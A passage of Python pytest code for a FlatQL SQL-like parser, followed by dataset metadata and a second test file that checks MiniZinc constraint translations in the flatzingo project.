statement: FlatQL = parse_flatql(
"SELECT count(table.column), "
" count(\"table\".column) "
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 2
assert isinstance(statement.projections[0], FunctionCall)
assert isinstance(statement.projections[1], FunctionCall)
assert statement.projections[0].name == 'count'
assert len(statement.projections[0].args) == 1
assert isinstance(statement.projections[0].args[0], Column)
assert not statement.projections[0].args[0].table.name._is_quoted
assert statement.projections[0].args[0].table.name.value() == "table"
assert not statement.projections[0].args[0].name._is_quoted
assert statement.projections[0].args[0].name.value() == "column"
assert statement.projections[1].name == 'count'
assert len(statement.projections[1].args) == 1
assert isinstance(statement.projections[1].args[0], Column)
assert statement.projections[1].args[0].table.name._is_quoted
assert statement.projections[1].args[0].table.name.value() == "table"
def test_projection_parser3():
statement: FlatQL = parse_flatql(
"SELECT count(\"table\".column, 1, 'abc') "
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], FunctionCall)
assert statement.projections[0].name == 'count'
assert len(statement.projections[0].args) == 3
assert isinstance(statement.projections[0].args[0], Column)
assert statement.projections[0].args[0].table.name.value() == "table"
assert statement.projections[0].args[0].name.value() == "column"
assert isinstance(statement.projections[0].args[1], Literal)
assert statement.projections[0].args[1].value() == '1'
assert isinstance(statement.projections[0].args[2], Literal)
assert statement.projections[0].args[2].value() == 'abc'
def test_projection_parser4():
statement: FlatQL = parse_flatql(
"SELECT count(table), count(\"where\") "
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 2
assert isinstance(statement.projections[0], FunctionCall)
assert isinstance(statement.projections[1], FunctionCall)
assert statement.projections[0].name == 'count'
assert len(statement.projections[0].args) == 1
assert isinstance(statement.projections[0].args[0], Table)
assert statement.projections[0].args[0].name.value() == "table"
assert statement.projections[1].name == 'count'
assert len(statement.projections[1].args) == 1
assert isinstance(statement.projections[1].args[0], Table)
assert statement.projections[1].args[0].name.value() == "where"
def test_projection_parser5():
statement: FlatQL = parse_flatql(
"SELECT table.column + table.column2 AS \"abc\""
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], BinaryExpression)
def test_projection_parser6():
statement: FlatQL = parse_flatql(
"SELECT (table.column + table.column2) AS \"abc\""
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], ParenExpression)
def test_projection_parser7():
statement: FlatQL = parse_flatql(
"SELECT (table.column + table.column2) * count(table.column) AS \"abc\""
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], BinaryExpression)
def test_projection_parser8():
statement: FlatQL = parse_flatql(
"SELECT (table.column + table.column2) * count(table.column) + toYear(now()) AS \"abc\""
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], BinaryExpression)
# noinspection PyUnresolvedReferences
def test_predicate_parser1():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE table.name = 'abc'"
" AND \"from\".\"name\" != 'abc' "
" AND \"table\".\"name\" != 11.1 ")
assert isinstance(statement.predicates, LogicalExpression)
assert isinstance(statement.predicates[0], Comparison)
assert isinstance(statement.predicates[1], Comparison)
assert isinstance(statement.predicates[0].operand, Column)
assert isinstance(statement.predicates[0].literal, Literal)
assert statement.predicates[0].operand.table.name.value() == 'table'
assert statement.predicates[0].operand.name.value() == 'name'
assert statement.predicates[0].operator == '='
assert statement.predicates[1].operator == '!='
assert statement.predicates[1].literal.value() == 'abc'
assert statement.predicates[2].operator == '!='
assert statement.predicates[2].literal.value() == '11.1'
# noinspection PyUnresolvedReferences
def test_predicate_parser2():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE table.name IS NOT NULL"
" AND \"table\".\"name\" IS NULL ")
assert len(statement.predicates) == 2
assert isinstance(statement.predicates[0], IsNull)
assert isinstance(statement.predicates[1], IsNull)
assert isinstance(statement.predicates[0].operand, Column)
assert isinstance(statement.predicates[1].operand, Column)
assert statement.predicates[0].negated
assert not statement.predicates[1].negated
# noinspection PyUnresolvedReferences
def test_predicate_parser3():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE table.name NOT BETWEEN 1 AND 12"
" AND \"table\".\"name\" BETWEEN 1 AND 12 ")
assert len(statement.predicates) == 2
assert isinstance(statement.predicates[0], Between)
assert isinstance(statement.predicates[1], Between)
assert isinstance(statement.predicates[0].operand, Column)
assert isinstance(statement.predicates[1].operand, Column)
assert statement.predicates[0].negated
assert not statement.predicates[1].negated
assert statement.predicates[0].literal1.value() == '1'
assert statement.predicates[0].literal2.value() == '12'
# noinspection PyUnresolvedReferences
def test_predicate_parser4():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE table.name NOT LIKE '%abc'"
" AND \"table\".\"name\" LIKE '%abc' ")
assert len(statement.predicates) == 2
assert isinstance(statement.predicates[0], Like)
assert isinstance(statement.predicates[1], Like)
assert isinstance(statement.predicates[0].operand, Column)
assert isinstance(statement.predicates[1].operand, Column)
assert statement.predicates[0].negated
assert not statement.predicates[1].negated
assert statement.predicates[0].string_literal.value() == '%abc'
assert statement.predicates[1].string_literal.value() == '%abc'
# noinspection PyUnresolvedReferences
def test_predicate_parser5():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE table.name NOT IN ('aa', '12')"
" AND \"table\".\"name\" IN ('aa', '12') ")
assert len(statement.predicates) == 2
assert isinstance(statement.predicates[0], In)
assert isinstance(statement.predicates[1], In)
assert isinstance(statement.predicates[0].operand, Column)
assert isinstance(statement.predicates[1].operand, Column)
assert statement.predicates[0].negated
assert not statement.predicates[1].negated
assert len(statement.predicates[1].literals) == 2
assert statement.predicates[1].literals[0].value() == 'aa'
assert statement.predicates[1].literals[1].value() == '12'
# noinspection PyUnresolvedReferences
def test_predicate_parser6():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE fun(table.name) IN ('aa', '12')")
assert len(statement.predicates) == 1
assert isinstance(statement.predicates[0], In)
assert isinstance(statement.predicates[0].operand, FunctionCall)
assert statement.predicates[0].operand.name == "fun"
assert len(statement.predicates[0].operand.args) == 1
assert isinstance(statement.predicates[0].operand.args[0], Column)
assert not statement.predicates[0].negated
assert len(statement.predicates[0].literals) == 2
assert statement.predicates[0].literals[0].value() == 'aa'
assert statement.predicates[0].literals[1].value() == '12'
# noinspection PyUnresolvedReferences
def test_predicate_parser7():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE if_null(table.column1)")
assert len(statement.predicates) == 1
assert isinstance(statement.predicates[0], FunctionCall)
def test_predicate_parser8():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE has(table.column1, ['1', '2'])")
assert len(statement.predicates) == 1
assert isinstance(statement.predicates[0], FunctionCall)
assert isinstance(statement.predicates[0].args[1], ArrayLiteral)
def test_predicate_parser9():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE has_any(table.column1, [1, 2])")
assert len(statement.predicates) == 1
assert isinstance(statement.predicates[0], FunctionCall)
assert isinstance(statement.predicates[0].args[1], ArrayLiteral)
def test_predicate_parser10():
statement: FlatQL = parse_flatql("SELECT table.column_1"
" FROM table_set_name WHERE has_any(table.column1, ['abc', 'abc'])")
assert len(statement.predicates) == 1
assert isinstance(statement.predicates[0], FunctionCall)
assert isinstance(statement.predicates[0].args[1], ArrayLiteral)
# noinspection PyUnresolvedReferences
def test_order_by_parser1():
statement: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name "
" ORDER BY \"table\" DESC")
assert statement is not None
assert statement.order_by_items is not None
assert len(statement.order_by_items) == 1
assert isinstance(statement.order_by_items[0].node, Identifier)
assert statement.order_by_items[0].direction == 'DESC'
# noinspection PyUnresolvedReferences
def test_order_by_parser2():
statement: FlatQL = parse_flatql("SELECT COUNT(table.column) AS \"count_table\" FROM table_set_name "
" ORDER BY \"count_table\"")
assert statement is not None
assert statement.order_by_items is not None
assert len(statement.order_by_items) == 1
assert isinstance(statement.order_by_items[0].node, Identifier)
assert statement.order_by_items[0].direction == 'ASC'
def test_limit_parser():
statement: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name "
" LIMIT 10")
assert statement is not None
assert statement.limit is not None
assert statement.limit.literal.value() == '10'
def test_offset_parser():
statement: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name OFFSET 10")
assert statement is not None
assert statement.offset is not None
assert statement.offset.literal.value() == '10'
def test_limit_offset_parser():
statement: FlatQL = parse_flatql("SELECT table.column_1, table.column_2 FROM table_set_name LIMIT 1 OFFSET 10")
assert statement is not None
assert statement.limit is not None
assert statement.offset is not None
assert statement.limit.literal.value() == '1'
assert statement.offset.literal.value() == '10'
def test_parse_qualified_name():
assert parse_qualified_name("table") == QualifiedName("table")
assert parse_qualified_name("_table") == QualifiedName("_table")
assert parse_qualified_name("table_2") == QualifiedName("table_2")
assert parse_qualified_name("table.name") == QualifiedName("table", "name")
assert parse_qualified_name("table.name.name") == QualifiedName("table", "name", "name")
with pytest.raises(SyntaxError):
parse_qualified_name("1table")
with pytest.raises(SyntaxError):
parse_qualified_name("table.")
def test_parse_join_condition():
assert parse_join_condition("Table1.id = Table2.table1_id") is not None
assert parse_join_condition("Table1.id = Table2.table1_id AND Table1.name IN ('a', 'b')") is not None
assert parse_join_condition("Table1.name IN ('a', 'b')") is not None
assert parse_join_condition("Table1.id = 12") is not None
assert parse_join_condition("Table1.id = Table2.table1_id AND Table1.name IS NOT NULL") is not None
assert parse_join_condition("Table1.id = Table2.table1_id AND Table1.id BETWEEN 1 AND 12") is not None
assert parse_join_condition("Table1.id = Table2.table1_id AND Table1.name LIKE '%a'") is not None
def test_parse_binary_expression1():
assert parse_binary_expression("1 + 1") is not None
assert parse_binary_expression("(1 + 1) * 2 / 3 - 1 ** 2") is not None
assert parse_binary_expression("round(3 / 10) * 100") is not None
assert parse_binary_expression("round(3 / 10)") is not None
assert parse_binary_expression("round(3) + fun(Table.column)") is not None
assert parse_binary_expression("fun(Table.column)") is not None
assert parse_binary_expression("SUM(Table.column) / COUNT(Table.column) * 100 + toYear(now())") is not None
# noinspection PyUnresolvedReferences
def test_parse_case_when1():
statement = parse_flatql("SELECT CASE WHEN Table.column = 1 THEN Table.column2 END FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert len(statement.projections[0].whens_expressions[0].logical_expression) == 1
assert isinstance(statement.projections[0].whens_expressions[0].logical_expression[0], Comparison)
# noinspection PyUnresolvedReferences
def test_parse_case_when2():
statement = parse_flatql("SELECT CASE WHEN Table.column IN ('a', 'b') THEN Table.column2 END FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert len(statement.projections[0].whens_expressions[0].logical_expression) == 1
assert isinstance(statement.projections[0].whens_expressions[0].logical_expression[0], In)
# noinspection PyUnresolvedReferences
def test_parse_case_when3():
statement = parse_flatql("SELECT CASE WHEN Table.column BETWEEN 1 AND 2 THEN Table.column2 END FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert len(statement.projections[0].whens_expressions[0].logical_expression) == 1
assert isinstance(statement.projections[0].whens_expressions[0].logical_expression[0], Between)
# noinspection PyUnresolvedReferences
def test_parse_case_when4():
statement = parse_flatql("SELECT CASE WHEN Table.column LIKE '%a' THEN Table.column2 END FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert len(statement.projections[0].whens_expressions[0].logical_expression) == 1
assert isinstance(statement.projections[0].whens_expressions[0].logical_expression[0], Like)
# noinspection PyUnresolvedReferences
def test_parse_case_when5():
statement = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 END FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert len(statement.projections[0].whens_expressions[0].logical_expression) == 1
assert isinstance(statement.projections[0].whens_expressions[0].logical_expression[0], IsNull)
# noinspection PyUnresolvedReferences
def test_parse_case_when6():
statement = parse_flatql("SELECT CASE WHEN Table.column IS NULL AND Table.column IS NOT NULL THEN Table.column2 END "
"FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert len(statement.projections[0].whens_expressions[0].logical_expression) == 2
assert isinstance(statement.projections[0].whens_expressions[0].logical_expression[0], IsNull)
# noinspection PyUnresolvedReferences
def test_parse_case_when7():
statement = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 "
" WHEN Table.column IS NOT NULL THEN Table.column2 END AS \"alias\" "
"FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 2
# noinspection PyUnresolvedReferences
def test_parse_case_when8():
statement = parse_flatql("SELECT COUNT(CASE WHEN Table.column IS NULL THEN 1 ELSE NULL END) AS \"alias\" "
"FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
# noinspection PyUnresolvedReferences
def test_parse_case_when9():
statement = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 "
"ELSE Table.column2 END AS \"alias\" "
"FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert statement.projections[0].else_expression is not None
# noinspection PyUnresolvedReferences
def test_parse_case_when10():
statement = parse_flatql("SELECT CASE WHEN Table.column IS NULL THEN Table.column2 + 100 "
"ELSE Table.column2 END AS \"alias\" "
"FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert statement.projections[0].else_expression is not None
# noinspection PyUnresolvedReferences
def test_parse_case_when11():
statement = parse_flatql("SELECT CASE WHEN if_null(Table.column) THEN Table.column2 + 100 "
"ELSE Table.column2 END AS \"alias\" "
"FROM table_set_name")
assert statement is not None
assert len(statement.projections) == 1
assert isinstance(statement.projections[0], CaseExpression)
assert len(statement.projections[0].whens_expressions) == 1
assert statement.projections[0].else_expression is not None
| 50.762226
| 130
| 0.712511
| 3,927
| 30,102
| 5.335625
| 0.036924
| 0.087147
| 0.052403
| 0.080895
| 0.925977
| 0.880781
| 0.830955
| 0.803322
| 0.776213
| 0.742328
| 0
| 0.021519
| 0.180254
| 30,102
| 592
| 131
| 50.847973
| 0.827606
| 0.025081
| 0
| 0.445887
| 0
| 0.012987
| 0.272089
| 0.003922
| 0
| 0
| 0
| 0
| 0.655844
| 1
| 0.088745
| false
| 0
| 0.006494
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74c28c94708e7af8a8478ee68c11bd533e7f7f4c
| 18,920
|
py
|
Python
|
tests/test_mzn.py
|
sthiele/flatzingo
|
2a2aa263a7b44b8773358267352321f439cc31ce
|
[
"MIT"
] | 1
|
2020-05-19T12:31:30.000Z
|
2020-05-19T12:31:30.000Z
|
tests/test_mzn.py
|
sthiele/flatzingo
|
2a2aa263a7b44b8773358267352321f439cc31ce
|
[
"MIT"
] | 9
|
2020-05-19T10:21:37.000Z
|
2020-07-02T08:58:23.000Z
|
tests/test_mzn.py
|
sthiele/flatzingo
|
2a2aa263a7b44b8773358267352321f439cc31ce
|
[
"MIT"
] | null | null | null |
from run import check
import itertools
import math
import operator
def toBool(*arg):
ret = []
for i in range(0,len(arg),2):
if arg[i]:
ret.append(f'var("{arg[i+1]}")')
return ret
BOOL = [False, True]
def test_mzn_slow():
### integer builtins
check("tests/mzn/array_var_int_element_1.mzn", [[f"b={b+1}", f"a1={list(a)[0]}", f"a2={list(a)[1]}", f"a3={list(a)[2]}", f"a4={list(a)[3]}", f"a5={list(a)[4]}", f"c={c}"] for b,c in itertools.product(range(0,5), range(-5,14)) for a in itertools.product(range(0,6), range(-3,4), range(-1,7), range(3,6), range(3,6)) if list(a)[b] == c ])
check("tests/mzn/array_int_maximum_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and max(a,b,c,d) == m) or (not r and not (max(a,b,c,d) == m)) ])
###TODO: recheck of own version im impl is done -> github minizinc
#check("tests/mzn/array_int_maximum_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and max(a,b,c,d) == m) or (not r) ])
check("tests/mzn/array_int_minimum_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and min(a,b,c,d) == m) or (not r and not (min(a,b,c,d) == m)) ])
###TODO: recheck of own version im impl is done -> github minizinc
#check("tests/mzn/array_int_minimum_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] + toBool(r,"r") for a,b,c,d,m,r in itertools.product(range(0,5), range(0,6), range(-5,3), range(-8,-2), range(0,9), BOOL ) if (r and min(a,b,c,d) == m) or (not r) ])
def test_mzn_fast():
### integer builtins
check("tests/mzn/all_different_1.mzn", [[f"x={x}", f"y={y}", f"z={z}"] for x,y,z in itertools.product(range(6), range(6), range(8)) if x!=y and x!=z and y!=z ])
check("tests/mzn/array_int_element_1.mzn", [[f"b={b+1}", f"c={c}"] for b,a,c in itertools.product(range(0,5), [[1,2,4,6,12]], range(0,14)) if a[b] == c ])
check("tests/mzn/array_int_maximum_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] for a,b,c,d,m in itertools.product(range(0,5), range(0,14), range(-5,3), range(-8,-2), range(0,17) ) if max(a,b,c,d) == m ])
check("tests/mzn/array_int_minimum_1.mzn", [[f"a={a}", f"b={b}", f"c={c}", f"d={d}", f"m={m}"] for a,b,c,d,m in itertools.product(range(0,5), range(0,14), range(-5,3), range(-8,-2), range(-10,7) ) if min(a,b,c,d) == m ])
check("tests/mzn/int_abs_1.mzn", [["x=-2", "y=2"], ["x=-1", "y=1"], ["x=0", "y=0"], ["x=1", "y=1"], ["y=2", "x=2"]])
#revisit to maybe avoid symmetries ?
check("tests/mzn/int_div_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), itertools.chain(range(-5,0), range(1,6)), range(8)) if (a*b>0 and a//b == c) or ( a*b<=0 and (a+(-a%b))//b == c)], comp = operator.ge)
check("tests/mzn/int_eq_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a == b])
check("tests/mzn/int_eq_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a == b) or (not r and a != b)])
check("tests/mzn/int_eq_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a == b) or (not r)])
check("tests/mzn/int_le_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a <= b])
check("tests/mzn/int_le_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a <= b) or (not r and a > b)])
check("tests/mzn/int_le_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a <= b) or (not r)])
check("tests/mzn/int_lin_eq_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if (3*a + 2*b) == 26])
check("tests/mzn/int_lin_eq_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) == 26) or (not r and (3*a + 2*b) != 26)])
check("tests/mzn/int_lin_eq_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) == 26) or (not r)], optstr=2)
check("tests/mzn/int_lin_le_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if (3*a + 2*b) <= 26])
check("tests/mzn/int_lin_le_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) <= 26) or (not r and (3*a + 2*b) > 26)])
check("tests/mzn/int_lin_le_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) <= 26) or (not r)])
check("tests/mzn/int_lin_ne_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if (3*a + 2*b) != 26])
check("tests/mzn/int_lin_ne_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) != 26) or (not r and (3*a + 2*b) == 26)])
check("tests/mzn/int_lin_ne_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and (3*a + 2*b) != 26) or (not r)])
check("tests/mzn/int_lt_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a < b])
check("tests/mzn/int_lt_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a < b) or (not r and a >= b)])
check("tests/mzn/int_lt_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a < b) or (not r)])
check("tests/mzn/int_max_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(8)) if c == max(a,b)])
check("tests/mzn/int_min_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(8)) if c == min(a,b)])
#revisit to maybe avoid symmetries ?
check("tests/mzn/int_mod_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), itertools.chain(range(-5,0), range(1,6)), range(8)) if (a*b>0 and a%b == c) or ( a*b<=0 and (-a%b) == -c)], comp = operator.ge)
check("tests/mzn/int_ne_1.mzn", [[f"a={a}", f"b={b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if a != b])
check("tests/mzn/int_ne_reif_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a != b) or (not r and a == b)])
check("tests/mzn/int_ne_imp_1.mzn", [[f"a={a}", f"b={b}"] + toBool(r,"r") for a,b,r in itertools.product(range(-3,10), range(-5,6), BOOL) if (r and a != b) or (not r)])
check("tests/mzn/int_plus_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(-10,11)) if a+b==c])
check("tests/mzn/int_pow_1.mzn", [[f"a={a}", f"b={b}", f"c={pow(a,b)}"] for a,b in itertools.product(range(1,10), range(0,6)) if 0 <= pow(a,b) <=100])
check("tests/mzn/int_times_1.mzn", [[f"a={a}", f"b={b}", f"c={a*b}"] for a,b in itertools.product(range(-3,10), range(-5,6)) if -100 <= a*b <=100])
check("tests/mzn/set_in_1.mzn", [[f"a={a}"] for a in range(-10,131) if a in [-4,3,4,5,123]])
check("tests/mzn/set_in_reif_1.mzn", [[f"a={a}"] + toBool(r,"r") for a,r in itertools.product(range(-10,131), BOOL) if (r and a in [-4,3,4,5,123]) or (not r and a not in [-4,3,4,5,123])])
check("tests/mzn/set_in_imp_1.mzn", [[f"a={a}"] + toBool(r,"r") for a,r in itertools.product(range(-10,131), BOOL) if (r and a in [-4,3,4,5,123]) or (not r)], optstr=2)
### boolean builtins
# no reif or imp possible, minizinc bug ?
check("tests/mzn/array_bool_and_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",r,"r") for a1,a2,a3,r in itertools.product(BOOL, BOOL, BOOL, BOOL) if (r and (a1 and a2 and a3)) or (not r and not (a1 and a2 and a3))])
# no reif or imp needed
check("tests/mzn/array_bool_element_1.mzn", [[f"b={b}"] + toBool(c,"c") for b,c in itertools.product(range(1,10), BOOL) if (c and b in [1,2,4,5,8,9]) or (not c and b not in [1,2,4,5,8,9])])
# no reif or imp possible, minizinc bug ?
check("tests/mzn/array_bool_or_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",r,"r") for a1,a2,a3,r in itertools.product(BOOL, BOOL, BOOL, BOOL) if (r and (a1 or a2 or a3)) or (not r and not (a1 or a2 or a3))])
# no reif or imp possible, minizinc bug ?
check("tests/mzn/array_bool_xor_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") for a1,a2,a3,a4 in itertools.product(BOOL, BOOL, BOOL, BOOL) if (a1 ^ a2 ^ a3 ^ a4) ])
# no reif or imp needed, translation is ok
check("tests/mzn/array_var_bool_element_1.mzn", [[f"b={b}"] + toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9",c,"c") for b,a1,a2,a3,a4,a5,a6,a7,a8,a9,c in itertools.product(range(1,10), BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if eval(f'a{b}')==c ])
# this only works for -O0 currently, minizinc bug
check("tests/mzn/bool2int_1.mzn", [[f"b={b}"] + toBool(c,"c") for b,c in itertools.product(range(0,10), BOOL) if (c and b == 1) or (not c and b == 0)])
# no reif or imp possible, minizinc bug ?
check("tests/mzn/bool_and_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a and b) or (not r and not (a and b)))])
check("tests/mzn/bool_clause_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9") for a1,a2,a3,a4,a5,a6,a7,a8,a9 in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9 ])
check("tests/mzn/bool_clause_reif_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9",r,"r") for a1,a2,a3,a4,a5,a6,a7,a8,a9,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if r and (a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9) or (not r and not (a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9)) ])
# does not exist ?
check("tests/mzn/bool_clause_imp_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",a5,"a5",a6,"a6",a7,"a7",a8,"a8",a9,"a9",r,"r") for a1,a2,a3,a4,a5,a6,a7,a8,a9,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL, BOOL) if r and (a1 or a2 or a3 or a4 or not a5 or not a6 or not a7 or not a8 or not a9) or (not r) ], optstr=2) # minizinc introduces symmetries on -O0
check("tests/mzn/bool_eq_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a == b)])
check("tests/mzn/bool_eq_reif_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a == b) or (not r and not (a == b)))])
check("tests/mzn/bool_eq_imp_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a == b) or (not r))], optstr=2)
check("tests/mzn/bool_le_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a <= b)])
check("tests/mzn/bool_le_reif_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a <= b) or (not r and not (a <= b)))])
